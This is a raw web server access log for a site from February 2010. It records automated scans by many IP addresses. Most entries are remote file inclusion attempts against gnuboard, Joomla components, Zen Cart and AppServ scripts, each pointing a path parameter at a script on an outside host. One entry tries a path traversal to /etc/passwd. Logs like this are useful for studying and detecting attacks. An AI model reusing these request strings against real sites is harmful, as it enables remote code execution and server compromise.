220.80.108.81 - - [08/Feb/2010:05:07:15 -0800] "GET //gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:07:15 -0800] "GET /logs/access_100201.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:05:07:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:07:28 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:07:28 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:07:28 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:07:38 -0800] "GET /logs/access_100129.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:05:07:53 -0800] "GET /logs/access_100130.log%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
94.102.63.60 - - [08/Feb/2010:05:07:56 -0800] "GET /logs/access_090929.log HTTP/1.0" 404 5258 "http://casino.ru/online/rating" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:09:39 -0800] "GET /logs/access_100107.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:10:24 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:10:25 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:10:25 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:05:11:23 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:12:15 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:18 -0800] "GET /write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:18 -0800] "GET /logs/access_100111.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:18 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:30 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:30 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:31 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:12:34 -0800] "GET /logs/access_100109.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:15:45 -0800] "GET /logs/access_100130.log%20%20/solpot.html?body=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:15:45 -0800] "GET /solpot.html?body=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:15:45 -0800] "GET /logs/solpot.html?body=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:16:30 -0800] "GET /logs/access_100202.log///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:16:30 -0800] "GET /logs/access_100201.log///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:17:25 -0800] "GET /logs/access_100112.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:17:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:17:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:17:30 -0800] "GET /logs/access_100103.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:18:27 -0800] "GET /write_comment.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:18:27 -0800] "GET /logs/access_100122.log%20%20/write_comment.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:18:27 -0800] "GET /logs/write_comment.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:18:54 -0800] "GET /bbs////write_update.php?board_skin_path=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:19:12 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:19:31 -0800] "GET /logs/access_100112.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:19:31 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:19:34 -0800] "GET /logs/access_100122.log/write_comment.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:19:47 -0800] "GET /logs/access_100103.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:19:58 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:19:58 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:19:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:20:01 -0800] "GET /logs/access_100103.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:20:12 -0800] "GET /logs/access_100130.log/solpot.html?body=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:20:35 -0800] "GET /logs/access_100108.log%20%20//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:20:42 -0800] "GET /logs/access_100126.log/solpot.html?body=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:21:55 -0800] "GET /write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:21:55 -0800] "GET /logs/access_100201.log%20%20/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:21:55 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:22:11 -0800] "GET /logs/access_100203.log%20%20/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:22:38 -0800] "GET /write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:22:38 -0800] "GET /logs/access_100201.log%20%20/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:22:38 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:22:53 -0800] "GET /logs/access_100203.log%20%20/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:23:42 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:23:42 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:23:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:23:47 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:25:32 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:25:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:25:33 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:25:56 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:27:29 -0800] "GET /logs/access_100110.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:27:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:27:30 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:05:27:41 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:05:27:49 -0800] "GET /logs/access_100110.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:05:27:49 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:28:05 -0800] "GET /logs/access_100103.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:28:58 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:28:58 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:28:58 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:28:58 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:29:18 -0800] "GET /logs/access_100103.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:29:18 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:29:18 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:29:28 -0800] "GET /logs/access_100110.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:29:45 -0800] "GET /logs/access_100122.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:30:02 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:30:02 -0800] "GET /logs/access_100110.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:30:02 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:05:30:21 -0800] "GET /logs/access_100108.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:05:30:23 -0800] "GET /logs/access_100110.log%20%20//skin/zina02_orange/error.php?dir=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:05:30:23 -0800] "GET /skin/zina02_orange/error.php?dir=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:05:30:23 -0800] "GET /logs//skin/zina02_orange/error.php?dir=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [08/Feb/2010:05:30:35 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:32:58 -0800] "GET /logs/access_100113.log%20%20//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:32:58 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:32:59 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:05:33:50 -0800] "GET /logs/access_100110.log//skin/zina02_orange/error.php?dir=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:33:59 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:34:08 -0800] "GET /logs/access_100125.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:34:08 -0800] "GET /logs/access_100126.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:34:44 -0800] "GET /logs/access_100125.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:34:44 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:36:31 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:36:32 -0800] "GET /bbs////write_update.php?board_skin_path=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:36:32 -0800] "GET /logs//bbs////write_update.php?board_skin_path=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:05:36:50 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:05:36:51 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:05:36:51 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:05:36:51 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:38:12 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:38:12 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:38:12 -0800] "GET /logs/access_100115.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:05:38:13 -0800] "GET /logs/access_100112.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:38:17 -0800] "GET /logs/access_100119.log//bbs////write_update.php?board_skin_path=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:39:47 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:39:47 -0800] "GET /logs/access_100126.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:39:47 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:39:51 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:39:51 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:39:51 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:40:03 -0800] "GET /logs/access_100119.log%20%20//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:40:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:40:06 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:40:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:05:40:16 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=1//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:05:40:17 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=1//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
